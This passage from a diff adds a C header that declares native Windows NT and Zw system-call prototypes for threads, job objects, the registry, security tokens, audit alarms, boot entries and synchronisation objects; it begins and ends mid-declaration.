+NtSetContextThread ( + IN HANDLE ThreadHandle, + IN PCONTEXT ThreadContext + ); + + +NTSTATUS +NTAPI +NtQueryInformationThread ( + IN HANDLE ThreadHandle, + IN THREADINFOCLASS ThreadInformationClass, + OUT PVOID ThreadInformation, + IN ULONG ThreadInformationLength, + OUT OPTIONAL PULONG ReturnLength + ); + + +NTSTATUS +NTAPI +NtSetInformationThread ( + IN HANDLE ThreadHandle, + IN THREADINFOCLASS ThreadInformationClass, + IN PVOID ThreadInformation, + IN ULONG ThreadInformationLength + ); + + +NTSTATUS +NTAPI +NtAlertThread ( + IN HANDLE ThreadHandle + ); + + +NTSTATUS +NTAPI +NtAlertResumeThread ( + IN HANDLE ThreadHandle, + OUT OPTIONAL PULONG PreviousSuspendCount + ); + + +NTSTATUS +NTAPI +NtImpersonateThread ( + IN HANDLE ServerThreadHandle, + IN HANDLE ClientThreadHandle, + IN PSECURITY_QUALITY_OF_SERVICE SecurityQos + ); + + +NTSTATUS +NTAPI +NtTestAlert ( + VOID + ); + + +NTSTATUS +NTAPI +NtRegisterThreadTerminatePort ( + IN HANDLE PortHandle + ); + + +NTSTATUS +NTAPI +NtSetLdtEntries ( + IN ULONG Selector0, + IN ULONG Entry0Low, + IN ULONG Entry0Hi, + IN ULONG Selector1, + IN ULONG Entry1Low, + IN ULONG Entry1Hi + ); + + +NTSTATUS +NTAPI +NtQueueApcThread ( + IN HANDLE ThreadHandle, + IN PPS_APC_ROUTINE ApcRoutine, + IN OPTIONAL PVOID ApcArgument1, + IN OPTIONAL PVOID ApcArgument2, + IN OPTIONAL PVOID ApcArgument3 + ); + + +NTSTATUS +NTAPI +NtCreateJobObject ( + OUT PHANDLE JobHandle, + IN ACCESS_MASK DesiredAccess, + IN OPTIONAL POBJECT_ATTRIBUTES ObjectAttributes + ); + + +NTSTATUS +NTAPI +NtOpenJobObject ( + OUT PHANDLE JobHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes + ); + + +NTSTATUS +NTAPI +NtAssignProcessToJobObject ( + IN HANDLE JobHandle, + IN HANDLE ProcessHandle + ); + + +NTSTATUS +NTAPI +NtTerminateJobObject ( + IN HANDLE JobHandle, + IN NTSTATUS ExitStatus + ); + + +NTSTATUS +NTAPI +NtIsProcessInJob ( + IN HANDLE ProcessHandle, + IN OPTIONAL HANDLE JobHandle + ); + + +NTSTATUS +NTAPI +NtCreateJobSet ( + IN ULONG NumJob, + IN PJOB_SET_ARRAY UserJobSet, + IN ULONG Flags + ); + + +NTSTATUS +NTAPI +NtQueryInformationJobObject ( + IN OPTIONAL HANDLE JobHandle, + IN JOBOBJECTINFOCLASS JobObjectInformationClass, + OUT PVOID JobObjectInformation, + IN ULONG JobObjectInformationLength, + OUT OPTIONAL PULONG ReturnLength + ); + + +NTSTATUS +NTAPI +NtSetInformationJobObject ( + IN HANDLE JobHandle, + IN JOBOBJECTINFOCLASS JobObjectInformationClass, + IN PVOID JobObjectInformation, + IN ULONG JobObjectInformationLength + ); + + +NTSTATUS +NTAPI +NtCreateKey( + OUT PHANDLE KeyHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes, + ULONG TitleIndex, + IN OPTIONAL PUNICODE_STRING Class, + IN ULONG CreateOptions, + OUT OPTIONAL PULONG Disposition + ); + + +NTSTATUS +NTAPI +NtDeleteKey( + IN HANDLE KeyHandle + ); + + +NTSTATUS +NTAPI +NtDeleteValueKey( + IN HANDLE KeyHandle, + IN PUNICODE_STRING ValueName + ); + + +NTSTATUS +NTAPI +NtEnumerateKey( + IN HANDLE KeyHandle, + IN ULONG Index, + IN KEY_INFORMATION_CLASS KeyInformationClass, + OUT OPTIONAL PVOID KeyInformation, + IN ULONG Length, + OUT PULONG ResultLength + ); + + +NTSTATUS +NTAPI +NtEnumerateValueKey( + IN HANDLE KeyHandle, + IN ULONG Index, + IN KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass, + OUT OPTIONAL PVOID KeyValueInformation, + IN ULONG Length, + OUT PULONG ResultLength + ); + + +NTSTATUS +NTAPI +NtFlushKey( + IN HANDLE KeyHandle + ); + + +NTSTATUS +NTAPI +NtInitializeRegistry( + IN USHORT BootCondition + ); + + +NTSTATUS +NTAPI +NtNotifyChangeKey( + IN HANDLE KeyHandle, + IN OPTIONAL HANDLE Event, + IN OPTIONAL PIO_APC_ROUTINE ApcRoutine, + IN OPTIONAL PVOID ApcContext, + OUT PIO_STATUS_BLOCK IoStatusBlock, + IN ULONG CompletionFilter, + IN BOOLEAN WatchTree, + OUT OPTIONAL PVOID Buffer, + IN ULONG BufferSize, + IN BOOLEAN Asynchronous + ); + + +NTSTATUS +NTAPI +NtNotifyChangeMultipleKeys( + IN HANDLE MasterKeyHandle, + IN OPTIONAL ULONG Count, + IN OPTIONAL OBJECT_ATTRIBUTES SlaveObjects[], + IN OPTIONAL HANDLE Event, + IN OPTIONAL PIO_APC_ROUTINE ApcRoutine, + IN OPTIONAL PVOID ApcContext, + OUT PIO_STATUS_BLOCK IoStatusBlock, + IN ULONG CompletionFilter, + IN BOOLEAN WatchTree, + OUT OPTIONAL PVOID Buffer, + IN ULONG BufferSize, + IN BOOLEAN Asynchronous + ); + + +NTSTATUS +NTAPI +NtLoadKey( + IN POBJECT_ATTRIBUTES TargetKey, + IN POBJECT_ATTRIBUTES SourceFile + ); + + +NTSTATUS +NTAPI +NtLoadKey2( + IN POBJECT_ATTRIBUTES TargetKey, + IN POBJECT_ATTRIBUTES SourceFile, + IN ULONG Flags + ); + + +NTSTATUS +NTAPI +NtLoadKeyEx( + IN POBJECT_ATTRIBUTES TargetKey, + IN POBJECT_ATTRIBUTES SourceFile, + IN ULONG Flags, + IN OPTIONAL HANDLE TrustClassKey + ); + + +NTSTATUS +NTAPI +NtOpenKey( + OUT PHANDLE KeyHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes + ); + + +NTSTATUS +NTAPI +NtQueryKey( + IN HANDLE KeyHandle, + IN KEY_INFORMATION_CLASS KeyInformationClass, + OUT OPTIONAL PVOID KeyInformation, + IN ULONG Length, + OUT PULONG ResultLength + ); + + +NTSTATUS +NTAPI +NtQueryValueKey( + IN HANDLE KeyHandle, + IN PUNICODE_STRING ValueName, + IN KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass, + OUT OPTIONAL PVOID KeyValueInformation, + IN ULONG Length, + OUT PULONG ResultLength + ); + + +NTSTATUS +NTAPI +NtQueryMultipleValueKey( + IN HANDLE KeyHandle, + IN OUT PKEY_VALUE_ENTRY ValueEntries, + IN ULONG EntryCount, + OUT PVOID ValueBuffer, + IN OUT PULONG BufferLength, + OUT OPTIONAL PULONG RequiredBufferLength + ); + + +NTSTATUS +NTAPI +NtReplaceKey( + IN POBJECT_ATTRIBUTES NewFile, + IN HANDLE TargetHandle, + IN POBJECT_ATTRIBUTES OldFile + ); + + +NTSTATUS +NTAPI +NtRenameKey( + IN HANDLE KeyHandle, + IN PUNICODE_STRING NewName + ); + + +NTSTATUS +NTAPI +NtCompactKeys( + IN ULONG Count, + IN HANDLE KeyArray[] + ); + + +NTSTATUS +NTAPI +NtCompressKey( + IN HANDLE Key + ); + + +NTSTATUS +NTAPI +NtRestoreKey( + IN HANDLE KeyHandle, + IN HANDLE FileHandle, + IN ULONG Flags + ); + + +NTSTATUS +NTAPI +NtSaveKey( + IN HANDLE KeyHandle, + IN HANDLE FileHandle + ); + + +NTSTATUS +NTAPI +NtSaveKeyEx( + IN HANDLE KeyHandle, + IN HANDLE FileHandle, + IN ULONG Format + ); + + +NTSTATUS +NTAPI +NtSaveMergedKeys( + IN HANDLE HighPrecedenceKeyHandle, + IN HANDLE LowPrecedenceKeyHandle, + IN HANDLE FileHandle + ); + + +NTSTATUS +NTAPI +NtSetValueKey( + IN HANDLE KeyHandle, + IN PUNICODE_STRING ValueName, + IN OPTIONAL ULONG TitleIndex, + IN ULONG Type, + IN OPTIONAL PVOID Data, + IN ULONG DataSize + ); + + +NTSTATUS +NTAPI +NtUnloadKey( + IN POBJECT_ATTRIBUTES TargetKey + ); + + +NTSTATUS +NTAPI +NtUnloadKey2( + IN POBJECT_ATTRIBUTES TargetKey, + IN ULONG Flags + ); + + +NTSTATUS +NTAPI +NtUnloadKeyEx( + IN POBJECT_ATTRIBUTES TargetKey, + IN OPTIONAL HANDLE Event + ); + + +NTSTATUS +NTAPI +NtSetInformationKey( + IN HANDLE KeyHandle, + IN KEY_SET_INFORMATION_CLASS KeySetInformationClass, + IN PVOID KeySetInformation, + IN ULONG KeySetInformationLength + ); + + +NTSTATUS +NTAPI +NtQueryOpenSubKeys( + IN POBJECT_ATTRIBUTES TargetKey, + OUT PULONG HandleCount + ); + + +NTSTATUS +NTAPI +NtQueryOpenSubKeysEx( + IN POBJECT_ATTRIBUTES TargetKey, + IN ULONG BufferLength, + OUT PVOID Buffer, + OUT PULONG RequiredSize + ); + + +NTSTATUS +NTAPI +NtLockRegistryKey( + IN HANDLE KeyHandle + ); + + +NTSTATUS +NTAPI +NtLockProductActivationKeys( + IN OUT OPTIONAL ULONG *pPrivateVer, + OUT OPTIONAL ULONG *pSafeMode + ); + + +NTSTATUS +NTAPI +NtAccessCheck ( + IN PSECURITY_DESCRIPTOR SecurityDescriptor, + IN HANDLE ClientToken, + IN ACCESS_MASK DesiredAccess, + IN PGENERIC_MAPPING GenericMapping, + OUT PPRIVILEGE_SET PrivilegeSet, + IN OUT PULONG PrivilegeSetLength, + OUT PACCESS_MASK GrantedAccess, + OUT PNTSTATUS AccessStatus + ); + + +NTSTATUS +NTAPI +NtAccessCheckByType ( + IN PSECURITY_DESCRIPTOR SecurityDescriptor, + IN OPTIONAL PSID PrincipalSelfSid, + IN HANDLE ClientToken, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_TYPE_LIST ObjectTypeList, + IN ULONG ObjectTypeListLength, + IN PGENERIC_MAPPING GenericMapping, + OUT PPRIVILEGE_SET PrivilegeSet, + IN OUT PULONG PrivilegeSetLength, + OUT PACCESS_MASK GrantedAccess, + OUT PNTSTATUS AccessStatus + ); + + +NTSTATUS +NTAPI +NtAccessCheckByTypeResultList ( + IN PSECURITY_DESCRIPTOR SecurityDescriptor, + IN OPTIONAL PSID PrincipalSelfSid, + IN HANDLE ClientToken, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_TYPE_LIST ObjectTypeList, + IN ULONG ObjectTypeListLength, + IN PGENERIC_MAPPING GenericMapping, + OUT PPRIVILEGE_SET PrivilegeSet, + IN OUT PULONG PrivilegeSetLength, + OUT PACCESS_MASK GrantedAccess, + OUT PNTSTATUS AccessStatus + ); + + +NTSTATUS +NTAPI +NtCreateToken( + OUT PHANDLE TokenHandle, + IN ACCESS_MASK DesiredAccess, + IN OPTIONAL POBJECT_ATTRIBUTES ObjectAttributes, + IN TOKEN_TYPE TokenType, + IN PLUID AuthenticationId, + IN PLARGE_INTEGER ExpirationTime, + IN PTOKEN_USER User, + IN PTOKEN_GROUPS Groups, + IN PTOKEN_PRIVILEGES Privileges, + IN OPTIONAL PTOKEN_OWNER Owner, + IN PTOKEN_PRIMARY_GROUP PrimaryGroup, + IN OPTIONAL PTOKEN_DEFAULT_DACL DefaultDacl, + IN PTOKEN_SOURCE TokenSource + ); + + +NTSTATUS +NTAPI +NtCompareTokens( + IN HANDLE FirstTokenHandle, + IN HANDLE SecondTokenHandle, + OUT PBOOLEAN Equal + ); + + +NTSTATUS +NTAPI +NtOpenThreadToken( + IN HANDLE ThreadHandle, + IN ACCESS_MASK DesiredAccess, + IN BOOLEAN OpenAsSelf, + OUT PHANDLE TokenHandle + ); + + +NTSTATUS +NTAPI +NtOpenThreadTokenEx( + IN HANDLE ThreadHandle, + IN ACCESS_MASK DesiredAccess, + IN BOOLEAN OpenAsSelf, + IN ULONG HandleAttributes, + OUT PHANDLE TokenHandle + ); + + +NTSTATUS +NTAPI +NtOpenProcessToken( + IN HANDLE ProcessHandle, + IN ACCESS_MASK DesiredAccess, + OUT PHANDLE TokenHandle + ); + + +NTSTATUS +NTAPI +NtOpenProcessTokenEx( + IN HANDLE ProcessHandle, + IN ACCESS_MASK DesiredAccess, + IN ULONG HandleAttributes, + OUT PHANDLE TokenHandle + ); + + +NTSTATUS +NTAPI +NtDuplicateToken( + IN HANDLE ExistingTokenHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes, + IN BOOLEAN EffectiveOnly, + IN TOKEN_TYPE TokenType, + OUT PHANDLE NewTokenHandle + ); + + +NTSTATUS +NTAPI +NtFilterToken ( + IN HANDLE ExistingTokenHandle, + IN ULONG Flags, + IN OPTIONAL PTOKEN_GROUPS SidsToDisable, + IN OPTIONAL PTOKEN_PRIVILEGES PrivilegesToDelete, + IN OPTIONAL PTOKEN_GROUPS RestrictedSids, + OUT PHANDLE NewTokenHandle + ); + + +NTSTATUS +NTAPI +NtImpersonateAnonymousToken( + IN HANDLE ThreadHandle + ); + + +NTSTATUS +NTAPI +NtQueryInformationToken ( + IN HANDLE TokenHandle, + IN TOKEN_INFORMATION_CLASS TokenInformationClass, + OUT PVOID TokenInformation, + IN ULONG TokenInformationLength, + OUT PULONG ReturnLength + ); + + +NTSTATUS +NTAPI +NtSetInformationToken ( + IN HANDLE TokenHandle, + IN TOKEN_INFORMATION_CLASS TokenInformationClass, + IN PVOID TokenInformation, + IN ULONG TokenInformationLength + ); + + +NTSTATUS +NTAPI +NtAdjustPrivilegesToken ( + IN HANDLE TokenHandle, + IN BOOLEAN DisableAllPrivileges, + IN OPTIONAL PTOKEN_PRIVILEGES NewState, + IN OPTIONAL ULONG BufferLength, + OUT PTOKEN_PRIVILEGES PreviousState, + OUT OPTIONAL PULONG ReturnLength + ); + + +NTSTATUS +NTAPI +NtAdjustGroupsToken ( + IN HANDLE TokenHandle, + IN BOOLEAN ResetToDefault, + IN PTOKEN_GROUPS NewState , + IN OPTIONAL ULONG BufferLength , + OUT PTOKEN_GROUPS PreviousState , + OUT PULONG ReturnLength + ); + + +NTSTATUS +NTAPI +NtPrivilegeCheck ( + IN HANDLE ClientToken, + IN OUT PPRIVILEGE_SET RequiredPrivileges, + OUT PBOOLEAN Result + ); + + +NTSTATUS +NTAPI +NtAccessCheckAndAuditAlarm ( + IN PUNICODE_STRING SubsystemName, + IN OPTIONAL PVOID HandleId, + IN PUNICODE_STRING ObjectTypeName, + IN PUNICODE_STRING ObjectName, + IN PSECURITY_DESCRIPTOR SecurityDescriptor, + IN ACCESS_MASK DesiredAccess, + IN PGENERIC_MAPPING GenericMapping, + IN BOOLEAN ObjectCreation, + OUT PACCESS_MASK GrantedAccess, + OUT PNTSTATUS AccessStatus, + OUT PBOOLEAN GenerateOnClose + ); + + +NTSTATUS +NTAPI +NtAccessCheckByTypeAndAuditAlarm ( + IN PUNICODE_STRING SubsystemName, + IN OPTIONAL PVOID HandleId, + IN PUNICODE_STRING ObjectTypeName, + IN PUNICODE_STRING ObjectName, + IN PSECURITY_DESCRIPTOR SecurityDescriptor, + IN OPTIONAL PSID PrincipalSelfSid, + IN ACCESS_MASK DesiredAccess, + IN AUDIT_EVENT_TYPE AuditType, + IN ULONG Flags, + IN POBJECT_TYPE_LIST ObjectTypeList, + IN ULONG ObjectTypeListLength, + IN PGENERIC_MAPPING GenericMapping, + IN BOOLEAN ObjectCreation, + OUT PACCESS_MASK GrantedAccess, + OUT PNTSTATUS AccessStatus, + OUT PBOOLEAN GenerateOnClose + ); + + +NTSTATUS +NTAPI +NtAccessCheckByTypeResultListAndAuditAlarm ( + IN PUNICODE_STRING SubsystemName, + IN OPTIONAL PVOID HandleId, + IN PUNICODE_STRING ObjectTypeName, + IN PUNICODE_STRING ObjectName, + IN PSECURITY_DESCRIPTOR SecurityDescriptor, + IN OPTIONAL PSID PrincipalSelfSid, + IN ACCESS_MASK DesiredAccess, + IN AUDIT_EVENT_TYPE AuditType, + IN ULONG Flags, + IN POBJECT_TYPE_LIST ObjectTypeList, + IN ULONG ObjectTypeListLength, + IN PGENERIC_MAPPING GenericMapping, + IN BOOLEAN ObjectCreation, + OUT PACCESS_MASK GrantedAccess, + OUT PNTSTATUS AccessStatus, + OUT PBOOLEAN GenerateOnClose + ); + + +NTSTATUS +NTAPI +NtAccessCheckByTypeResultListAndAuditAlarmByHandle ( + IN PUNICODE_STRING SubsystemName, + IN OPTIONAL PVOID HandleId, + IN HANDLE ClientToken, + IN PUNICODE_STRING ObjectTypeName, + IN PUNICODE_STRING ObjectName, + IN PSECURITY_DESCRIPTOR SecurityDescriptor, + IN OPTIONAL PSID PrincipalSelfSid, + IN ACCESS_MASK DesiredAccess, + IN AUDIT_EVENT_TYPE AuditType, + IN ULONG Flags, + IN POBJECT_TYPE_LIST ObjectTypeList, + IN ULONG ObjectTypeListLength, + IN PGENERIC_MAPPING GenericMapping, + IN BOOLEAN ObjectCreation, + OUT PACCESS_MASK GrantedAccess, + OUT PNTSTATUS AccessStatus, + OUT PBOOLEAN GenerateOnClose + ); + + +NTSTATUS +NTAPI +NtOpenObjectAuditAlarm ( + IN PUNICODE_STRING SubsystemName, + IN OPTIONAL PVOID HandleId, + IN PUNICODE_STRING ObjectTypeName, + IN PUNICODE_STRING ObjectName, + IN OPTIONAL PSECURITY_DESCRIPTOR SecurityDescriptor, + IN HANDLE ClientToken, + IN ACCESS_MASK DesiredAccess, + IN ACCESS_MASK GrantedAccess, + IN OPTIONAL PPRIVILEGE_SET Privileges, + IN BOOLEAN ObjectCreation, + IN BOOLEAN AccessGranted, + OUT PBOOLEAN GenerateOnClose + ); + + +NTSTATUS +NTAPI +NtPrivilegeObjectAuditAlarm ( + IN PUNICODE_STRING SubsystemName, + IN OPTIONAL PVOID HandleId, + IN HANDLE ClientToken, + IN ACCESS_MASK DesiredAccess, + IN PPRIVILEGE_SET Privileges, + IN BOOLEAN AccessGranted + ); + + +NTSTATUS +NTAPI +NtCloseObjectAuditAlarm ( + IN PUNICODE_STRING SubsystemName, + IN OPTIONAL PVOID HandleId, + IN BOOLEAN GenerateOnClose + ); + + +NTSTATUS +NTAPI +NtDeleteObjectAuditAlarm ( + IN PUNICODE_STRING SubsystemName, + IN OPTIONAL PVOID HandleId, + IN BOOLEAN GenerateOnClose + ); + + +NTSTATUS +NTAPI +NtPrivilegedServiceAuditAlarm ( + IN PUNICODE_STRING SubsystemName, + IN PUNICODE_STRING ServiceName, + IN HANDLE ClientToken, + IN PPRIVILEGE_SET Privileges, + IN BOOLEAN AccessGranted + ); + + +NTSTATUS +NTAPI +NtContinue ( + IN PCONTEXT ContextRecord, + IN BOOLEAN TestAlert + ); + + +NTSTATUS +NTAPI +NtRaiseException ( + IN PEXCEPTION_RECORD ExceptionRecord, + IN PCONTEXT ContextRecord, + IN BOOLEAN FirstChance + ); + +// end_ntapi + + +// begin_zwapi +NTSTATUS +NTAPI +ZwDelayExecution ( + IN BOOLEAN Alertable, + IN PLARGE_INTEGER DelayInterval + ); + + + +NTSTATUS +NTAPI +ZwQuerySystemEnvironmentValue ( + IN PUNICODE_STRING VariableName, + OUT PWSTR VariableValue, + IN USHORT ValueLength, + OUT OPTIONAL PUSHORT ReturnLength + ); + + + +NTSTATUS +NTAPI +ZwSetSystemEnvironmentValue ( + IN PUNICODE_STRING VariableName, + IN PUNICODE_STRING VariableValue + ); + + + +NTSTATUS +NTAPI +ZwQuerySystemEnvironmentValueEx ( + IN PUNICODE_STRING VariableName, + IN LPGUID VendorGuid, + OUT OPTIONAL PVOID Value, + IN OUT PULONG ValueLength, + OUT OPTIONAL PULONG Attributes + ); + + + +NTSTATUS +NTAPI +ZwSetSystemEnvironmentValueEx ( + IN PUNICODE_STRING VariableName, + IN LPGUID VendorGuid, + IN OPTIONAL PVOID Value, + IN ULONG ValueLength, + IN ULONG Attributes + ); + + + +NTSTATUS +NTAPI +ZwEnumerateSystemEnvironmentValuesEx ( + IN ULONG InformationClass, + OUT PVOID Buffer, + IN OUT PULONG BufferLength + ); + + + +NTSTATUS +NTAPI +ZwAddBootEntry ( + IN PBOOT_ENTRY BootEntry, + OUT OPTIONAL PULONG Id + ); + + + +NTSTATUS +NTAPI +ZwDeleteBootEntry ( + IN ULONG Id + ); + + + +NTSTATUS +NTAPI +ZwModifyBootEntry ( + IN PBOOT_ENTRY BootEntry + ); + + + +NTSTATUS +NTAPI +ZwEnumerateBootEntries ( + OUT OPTIONAL PVOID Buffer, + IN OUT PULONG BufferLength + ); + + + +NTSTATUS +NTAPI +ZwQueryBootEntryOrder ( + OUT OPTIONAL PULONG Ids, + IN OUT PULONG Count + ); + + + +NTSTATUS +NTAPI +ZwSetBootEntryOrder ( + IN PULONG Ids, + IN ULONG Count + ); + + + +NTSTATUS +NTAPI +ZwQueryBootOptions ( + OUT OPTIONAL PBOOT_OPTIONS BootOptions, + IN OUT PULONG BootOptionsLength + ); + + + +NTSTATUS +NTAPI +ZwSetBootOptions ( + IN PBOOT_OPTIONS BootOptions, + IN ULONG FieldsToChange + ); + + + +NTSTATUS +NTAPI +ZwTranslateFilePath ( + IN PFILE_PATH InputFilePath, + IN ULONG OutputType, + OUT OPTIONAL PFILE_PATH OutputFilePath, + IN OUT OPTIONAL PULONG OutputFilePathLength + ); + + + +NTSTATUS +NTAPI +ZwAddDriverEntry ( + IN PEFI_DRIVER_ENTRY DriverEntry, + OUT OPTIONAL PULONG Id + ); + + + +NTSTATUS +NTAPI +ZwDeleteDriverEntry ( + IN ULONG Id + ); + + + +NTSTATUS +NTAPI +ZwModifyDriverEntry ( + IN PEFI_DRIVER_ENTRY DriverEntry + ); + + + +NTSTATUS +NTAPI +ZwEnumerateDriverEntries ( + OUT PVOID Buffer, + IN OUT PULONG BufferLength + ); + + + +NTSTATUS +NTAPI +ZwQueryDriverEntryOrder ( + OUT PULONG Ids, + IN OUT PULONG Count + ); + + + +NTSTATUS +NTAPI +ZwSetDriverEntryOrder ( + IN PULONG Ids, + IN ULONG Count + ); + + + +NTSTATUS +NTAPI +ZwClearEvent ( + IN HANDLE EventHandle + ); + + + +NTSTATUS +NTAPI +ZwCreateEvent ( + OUT PHANDLE EventHandle, + IN ACCESS_MASK DesiredAccess, + IN OPTIONAL POBJECT_ATTRIBUTES ObjectAttributes, + IN EVENT_TYPE EventType, + IN BOOLEAN InitialState + ); + + + +NTSTATUS +NTAPI +ZwOpenEvent ( + OUT PHANDLE EventHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes + ); + + + +NTSTATUS +NTAPI +ZwPulseEvent ( + IN HANDLE EventHandle, + OUT OPTIONAL PLONG PreviousState + ); + + + +NTSTATUS +NTAPI +ZwQueryEvent ( + IN HANDLE EventHandle, + IN EVENT_INFORMATION_CLASS EventInformationClass, + OUT PVOID EventInformation, + IN ULONG EventInformationLength, + OUT OPTIONAL PULONG ReturnLength + ); + + + +NTSTATUS +NTAPI +ZwResetEvent ( + IN HANDLE EventHandle, + OUT OPTIONAL PLONG PreviousState + ); + + + +NTSTATUS +NTAPI +ZwSetEvent ( + IN HANDLE EventHandle, + OUT OPTIONAL PLONG PreviousState + ); + + + +NTSTATUS +NTAPI +ZwSetEventBoostPriority ( + IN HANDLE EventHandle + ); + + + +NTSTATUS +NTAPI +ZwCreateEventPair ( + OUT PHANDLE EventPairHandle, + IN ACCESS_MASK DesiredAccess, + IN OPTIONAL POBJECT_ATTRIBUTES ObjectAttributes + ); + + + +NTSTATUS +NTAPI +ZwOpenEventPair ( + OUT PHANDLE EventPairHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes + ); + + + +NTSTATUS +NTAPI +ZwWaitLowEventPair ( + IN HANDLE EventPairHandle + ); + + + +NTSTATUS +NTAPI +ZwWaitHighEventPair ( + IN HANDLE EventPairHandle + ); + + + +NTSTATUS +NTAPI +ZwSetLowWaitHighEventPair ( + IN HANDLE EventPairHandle + ); + + + +NTSTATUS +NTAPI +ZwSetHighWaitLowEventPair ( + IN HANDLE EventPairHandle + ); + + + +NTSTATUS +NTAPI +ZwSetLowEventPair ( + IN HANDLE EventPairHandle + ); + + + +NTSTATUS +NTAPI +ZwSetHighEventPair ( + IN HANDLE EventPairHandle + ); + + + +NTSTATUS +NTAPI +ZwCreateMutant ( + OUT PHANDLE MutantHandle, + IN ACCESS_MASK DesiredAccess, + IN OPTIONAL POBJECT_ATTRIBUTES ObjectAttributes, + IN BOOLEAN InitialOwner + ); + + + +NTSTATUS +NTAPI +ZwOpenMutant ( + OUT PHANDLE MutantHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes + ); + + + +NTSTATUS +NTAPI +ZwQueryMutant ( + IN HANDLE MutantHandle, + IN MUTANT_INFORMATION_CLASS MutantInformationClass, + OUT PVOID MutantInformation, + IN ULONG MutantInformationLength, + OUT OPTIONAL PULONG ReturnLength + ); + + + +NTSTATUS +NTAPI +ZwReleaseMutant ( + IN HANDLE MutantHandle, + OUT OPTIONAL PLONG PreviousCount + ); + + + +NTSTATUS +NTAPI +ZwCreateSemaphore ( + OUT PHANDLE SemaphoreHandle, + IN ACCESS_MASK DesiredAccess, + IN OPTIONAL POBJECT_ATTRIBUTES ObjectAttributes, + IN LONG InitialCount, + IN LONG MaximumCount + ); + + + +NTSTATUS +NTAPI +ZwOpenSemaphore( + OUT PHANDLE SemaphoreHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes + ); + + + +NTSTATUS +NTAPI +ZwQuerySemaphore ( + IN HANDLE SemaphoreHandle, + IN SEMAPHORE_INFORMATION_CLASS SemaphoreInformationClass, + OUT PVOID SemaphoreInformation, + IN ULONG SemaphoreInformationLength, + OUT OPTIONAL PULONG ReturnLength + ); + + + +NTSTATUS +NTAPI +ZwReleaseSemaphore( + IN HANDLE SemaphoreHandle, + IN LONG ReleaseCount, + OUT OPTIONAL PLONG PreviousCount + ); + + + +NTSTATUS +NTAPI +ZwCreateTimer ( + OUT PHANDLE TimerHandle, + IN ACCESS_MASK DesiredAccess, + IN OPTIONAL POBJECT_ATTRIBUTES ObjectAttributes, + IN TIMER_TYPE TimerType + ); + + + +NTSTATUS +NTAPI +ZwOpenTimer ( + OUT PHANDLE TimerHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes + ); + + + +NTSTATUS +NTAPI +ZwCancelTimer ( + IN HANDLE TimerHandle, + OUT OPTIONAL PBOOLEAN CurrentState + ); + + + +NTSTATUS +NTAPI +ZwQueryTimer ( + IN HANDLE TimerHandle, + IN TIMER_INFORMATION_CLASS TimerInformationClass, + OUT PVOID TimerInformation, + IN ULONG TimerInformationLength, + OUT OPTIONAL PULONG ReturnLength + ); + + + +NTSTATUS +NTAPI +ZwSetTimer ( + IN HANDLE TimerHandle, + IN PLARGE_INTEGER DueTime, + IN OPTIONAL PTIMER_APC_ROUTINE TimerApcRoutine, + IN OPTIONAL PVOID TimerContext, + IN BOOLEAN ResumeTimer, + IN OPTIONAL LONG Period, + OUT OPTIONAL PBOOLEAN PreviousState + ); + + + +NTSTATUS +NTAPI +ZwQuerySystemTime ( + OUT PLARGE_INTEGER SystemTime + ); + + + +NTSTATUS +NTAPI +ZwSetSystemTime ( + IN OPTIONAL PLARGE_INTEGER SystemTime, + OUT OPTIONAL PLARGE_INTEGER PreviousTime + ); + + + +NTSTATUS +NTAPI +ZwQueryTimerResolution ( + OUT PULONG MaximumTime, + OUT PULONG MinimumTime, + OUT PULONG CurrentTime + ); + + + +NTSTATUS +NTAPI +ZwSetTimerResolution ( + IN ULONG DesiredTime, + IN BOOLEAN SetResolution, + OUT PULONG ActualTime + ); + + + +NTSTATUS +NTAPI +ZwAllocateLocallyUniqueId ( + OUT PLUID Luid + ); + + + +NTSTATUS +NTAPI +ZwSetUuidSeed ( + IN PCHAR Seed + ); + + + +NTSTATUS +NTAPI +ZwAllocateUuids ( + OUT PULARGE_INTEGER Time, + OUT PULONG Range, + OUT PULONG Sequence, + OUT PCHAR Seed + ); + + + +NTSTATUS +NTAPI +ZwCreateProfile ( + OUT PHANDLE ProfileHandle, + IN HANDLE Process OPTIONAL, + IN PVOID ProfileBase, + IN SIZE_T ProfileSize, + IN ULONG BucketSize, + IN PULONG Buffer, + IN ULONG BufferSize, + IN KPROFILE_SOURCE ProfileSource, + IN KAFFINITY Affinity + ); + + + +NTSTATUS +NTAPI +ZwStartProfile ( + IN HANDLE ProfileHandle + ); + + + +NTSTATUS +NTAPI +ZwStopProfile ( + IN HANDLE ProfileHandle + ); + + + +NTSTATUS +NTAPI +ZwSetIntervalProfile ( + IN ULONG Interval, + IN KPROFILE_SOURCE Source + ); + + + +NTSTATUS +NTAPI +ZwQueryIntervalProfile ( + IN KPROFILE_SOURCE ProfileSource, + OUT PULONG Interval + ); + + + +NTSTATUS +NTAPI +ZwQueryPerformanceCounter ( + OUT PLARGE_INTEGER PerformanceCounter, + OUT OPTIONAL PLARGE_INTEGER PerformanceFrequency + ); + + + +NTSTATUS +NTAPI +ZwCreateKeyedEvent ( + OUT PHANDLE KeyedEventHandle, + IN ACCESS_MASK DesiredAccess, + IN OPTIONAL POBJECT_ATTRIBUTES ObjectAttributes, + IN ULONG Flags + ); + + + +NTSTATUS +NTAPI +ZwOpenKeyedEvent ( + OUT PHANDLE KeyedEventHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes + ); + + + +NTSTATUS +NTAPI +ZwReleaseKeyedEvent ( + IN HANDLE KeyedEventHandle, + IN PVOID KeyValue, + IN BOOLEAN Alertable, + IN 